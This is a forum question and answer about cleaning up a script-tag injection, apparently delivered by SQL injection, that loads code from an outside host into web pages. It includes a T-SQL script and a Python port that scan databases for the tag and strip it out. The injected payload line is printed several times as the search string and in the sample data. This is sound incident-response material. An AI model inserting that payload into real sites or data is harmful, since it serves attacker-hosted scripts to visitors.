Deciphering this XSS attack
<p>Does anybody know more about this attack?</p>
<p>I recently got this script injected into my web sites.</p>
<p><strong><em>By the way, don't go to this web site, since it's the source of the infection.</em></strong></p>
<pre><code>&lt;/title&gt;&lt;script src=http://google-stats50.**fo/***.php&gt;</code></pre>
<p>What kind of attack is it, SQL or code?</p>
<p><strong><em>By the way, don't go to this web site, since it's the source of the infection.</em></strong></p>
<p>The question is, by what kind of attack does this infection occur?</p>
<p>We found it, and it was not like the Twitter attack; it was through request parameters in a URL, injecting SQL directly in the parameter.</p>
<p>Here is the SQL script produced by our SQL team to clean your database if it was infected:</p>
<pre><code>/*************************************************************************
 SQL INJECTED DATABASE
*************************************************************************/
DECLARE @dbName VARCHAR(200),
        @SqlString NVARCHAR(MAX),
        @SearchText VARCHAR(MAX),
        @SearchTextLike VARCHAR(MAX),
        @NbItems INT,
        @TableName VARCHAR(255),
        @ColoneName VARCHAR(255),
        @objId BIGINT,
        @tmpSqlString NVARCHAR(MAX),
        @CleanUp BIT,
        @RowCount BIGINT,
        @debug BIT,
        @Msg VARCHAR(MAX);

SET @debug = 0;   -- 1 = Additional prints
SET @CleanUp = 0; -- 1 = Update tables (0 = report only)
SET @SearchText = '&lt;/title&gt;&lt;script src=http://google-stats50.info/ur.php&gt;&lt;/script&gt;';
SET @SearchTextLike = '%' + @SearchText + '%';

DECLARE @QueryResults TABLE (SqlString VARCHAR(MAX), TableName VARCHAR(255), ColoneName VARCHAR(255));
DECLARE @InfectedDB TABLE (InfectedDbName VARCHAR(255));
DECLARE @CleanedUpDB TABLE (DbName VARCHAR(255), Msg VARCHAR(MAX));
DECLARE @DbToValidate TABLE (DbName VARCHAR(255));

-- All online user databases (system databases are skipped)
INSERT INTO @DbToValidate
SELECT Name FROM sys.databases
WHERE [state] = 0
  AND Name NOT IN ('master', 'tempdb', 'model', 'msdb')
  AND Name NOT LIKE 'sys%'
ORDER BY Name;

DECLARE db_cursor CURSOR FOR SELECT DbName FROM @DbToValidate;
OPEN db_cursor;
FETCH NEXT FROM db_cursor INTO @dbName;

WHILE @@FETCH_STATUS = 0
BEGIN
    SET @Msg = 'Traitement pour : ' + @dbName;
    INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
    PRINT @Msg;

    IF (SELECT [state] FROM sys.databases WHERE Name = @dbName) = 0
    BEGIN
        IF @debug = 1 PRINT Char(13) + '1 - Processing Database : ' + @dbName;

        -- Empty the contents
        DELETE FROM @QueryResults;
        IF @debug = 1 PRINT '2 - Vider la table @QueryResults';

        -- Build one SELECT (report mode) or UPDATE (cleanup mode) statement
        -- per character column of every user table in this database
        IF @CleanUp = 0
        BEGIN
            SET @SqlString = ' USE [' + @dbName + '];'
                + ' SELECT ''SELECT @NbItems = COUNT(1) FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name'
                + ' FROM sys.tables tbl inner join'
                + ' sys.columns col on tbl.object_id = col.object_id'
                + ' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%''';
        END
        ELSE
        BEGIN
            SET @SqlString = ' USE [' + @dbName + '];'
                + ' SELECT ''UPDATE ['' + tbl.Name + ''] SET ['' + col.name + ''] = REPLACE(CAST(['' + col.name + ''] AS VARCHAR(MAX)),''''' + @SearchText + ''''','''''''') FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name'
                + ' FROM sys.tables tbl inner join'
                + ' sys.columns col on tbl.object_id = col.object_id'
                + ' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%''';
        END

        INSERT INTO @QueryResults EXEC sp_executesql @SqlString;
        -- Check for errors
        IF @@ERROR &lt;&gt; 0 BEGIN GOTO NEXTPRINC END
        IF @debug = 1 PRINT '3 - Récupérer les Query String';

        -- Loop over the generated query strings to look for SQL injections
        DECLARE query_cursor CURSOR FOR SELECT SqlString, TableName, ColoneName FROM @QueryResults;
        OPEN query_cursor;
        FETCH NEXT FROM query_cursor INTO @SqlString, @TableName, @ColoneName;
        IF @debug = 1 PRINT '4 - Cursor sur les Query String';

        WHILE @@FETCH_STATUS = 0
        BEGIN
            SET @tmpSqlString = 'USE [' + @dbName + '];' + 'SELECT @objId = OBJECT_ID(''' + @TableName + ''');'
            EXEC sp_executesql @tmpSqlString, N'@objId bigint output', @objId output
            -- Check for errors
            IF @@ERROR &lt;&gt; 0 BEGIN GOTO NEXTINNER END

            IF ISNULL(@objId, -1) &lt;&gt; -1
            BEGIN
                SET @SqlString = 'USE [' + @dbName + '];' + @SqlString;
                IF @CleanUp = 0
                BEGIN
                    EXEC sp_executesql @SqlString, N'@NbItems int output', @NbItems output
                END
                ELSE
                BEGIN
                    EXEC sp_executesql @SqlString
                    SET @RowCount = @@ROWCOUNT
                END
                -- Check for errors (note: in cleanup mode @@ERROR here reflects the SET above, not the EXEC)
                IF @@ERROR &lt;&gt; 0 BEGIN GOTO NEXTINNER END

                IF @CleanUp = 0
                BEGIN
                    IF ISNULL(@NbItems, 0) &lt;&gt; 0
                    BEGIN
                        -- Infected DB!
                        INSERT INTO @InfectedDB VALUES (@dbName);
                        PRINT '**** BD Infectée : ' + @dbName;
                        SELECT * FROM @InfectedDB;
                        BREAK;
                    END
                END
                ELSE
                BEGIN
                    IF @RowCount &lt;&gt; 0
                    BEGIN
                        SET @Msg = '**** Table --&gt; [' + @TableName + '] .::. Colonne --&gt; [' + @ColoneName + '] .::. Nb Rows --&gt; ' + CAST(@RowCount AS VARCHAR(7));
                        INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
                        PRINT @Msg;
                    END
                END
            END
        NEXTINNER:
            -- Get the next query.
            FETCH NEXT FROM query_cursor INTO @SqlString, @TableName, @ColoneName;
        END
        CLOSE query_cursor;
        DEALLOCATE query_cursor;
        IF @debug = 1 PRINT '5 - Vider cursor query';
    END
    ELSE
    BEGIN
        SET @Msg = '**** La base de données n''est pas ''ONLINE''.';
        INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
        PRINT @Msg;
    END

    SET @Msg = 'Fin traitement pour : ' + @dbName;
    INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
    PRINT @Msg;
NEXTPRINC:
    -- Get the next database.
    FETCH NEXT FROM db_cursor INTO @dbName;
END

IF @CleanUp = 0
BEGIN
    SELECT * FROM @InfectedDB;
END
ELSE
BEGIN
    SELECT * FROM @CleanedUpDB;
END
GOTO FIN

FININNER:
CLOSE query_cursor;
DEALLOCATE query_cursor;
FIN:
-- Close the cursor
CLOSE db_cursor;
DEALLOCATE db_cursor;
</code></pre>
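The poster's T-SQL script above does two jobs: in report mode it counts, per character column of every user table, the rows that contain the injected script tag, and in cleanup mode it strips that tag with REPLACE. The following is an added example, not the poster's script nor anything from the site mentioned in the post; it reimplements the same scan-or-clean logic in Python against an in-memory SQLite database. The sample tables and rows are constructed for the example; the search string is the one the T-SQL script searches for. Two design choices differ from the original: the search string is bound as a query parameter instead of being spliced into the statement text (which avoids the quoting gymnastics the T-SQL version needs and any risk of the payload itself being interpreted as SQL), and matching uses an exact substring test (`instr`) so that the report count agrees with what `REPLACE` will actually remove.

```python
import sqlite3

# The injected string the post's T-SQL script searches for (taken from the post).
PAYLOAD = '</title><script src=http://google-stats50.info/ur.php></script>'

# Declared-type fragments that mark a column as text-like (CHAR, VARCHAR, TEXT, CLOB ...).
TEXT_TYPE_HINTS = ("CHAR", "CLOB", "TEXT")


def build_sample_db():
    """Constructed sample database (not real data): two tables, three tainted rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT, price REAL);
        CREATE TABLE comments (id INTEGER PRIMARY KEY, author VARCHAR(50), body TEXT);
    """)
    conn.executemany("INSERT INTO products (name, description, price) VALUES (?, ?, ?)", [
        ("Widget", "A fine widget", 9.99),
        ("Gadget" + PAYLOAD, "Tainted name", 19.99),
        ("Gizmo", "Tainted description " + PAYLOAD, 4.50),
    ])
    conn.executemany("INSERT INTO comments (author, body) VALUES (?, ?)", [
        ("alice", "Works great"),
        ("bob", PAYLOAD + "injected"),
    ])
    conn.commit()
    return conn


def quote_ident(name):
    """Quote a table/column identifier so it cannot be misread as SQL."""
    return '"' + name.replace('"', '""') + '"'


def text_columns(conn):
    """Yield (table, column) for every text-like column of every user table."""
    tables = [row[0] for row in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        # PRAGMA table_info rows: (cid, name, type, notnull, dflt_value, pk)
        for _cid, col, decl_type, *_rest in conn.execute(f"PRAGMA table_info({quote_ident(table)})"):
            if any(hint in (decl_type or "").upper() for hint in TEXT_TYPE_HINTS):
                yield table, col


def scan(conn, payload):
    """Report mode (the script's @CleanUp = 0): rows per column containing the payload."""
    hits = {}
    for table, col in text_columns(conn):
        # instr() is an exact, case-sensitive substring test, so the count matches
        # exactly what REPLACE() in clean() would touch; the payload is bound as a
        # parameter, never concatenated into the statement text.
        sql = f"SELECT COUNT(*) FROM {quote_ident(table)} WHERE instr({quote_ident(col)}, ?) > 0"
        count = conn.execute(sql, (payload,)).fetchone()[0]
        if count:
            hits[(table, col)] = count
    return hits


def clean(conn, payload):
    """Cleanup mode (the script's @CleanUp = 1): strip the payload; rows changed per column."""
    changed = {}
    for table, col in text_columns(conn):
        t, c = quote_ident(table), quote_ident(col)
        cur = conn.execute(f"UPDATE {t} SET {c} = REPLACE({c}, ?, '') WHERE instr({c}, ?) > 0",
                           (payload, payload))
        if cur.rowcount:
            changed[(table, col)] = cur.rowcount
    conn.commit()
    return changed


if __name__ == "__main__":
    db = build_sample_db()
    print("before:", scan(db, PAYLOAD))   # three tainted columns
    print("cleaned:", clean(db, PAYLOAD))
    print("after:", scan(db, PAYLOAD))    # {}
```

Run `scan` first and review its output before calling `clean`, which is the same dry-run-then-update split the `@CleanUp` flag gives the T-SQL version; on a real incident, take a backup before the update pass and keep the scan results as evidence of which tables and columns were written to, since that points at the vulnerable request parameter.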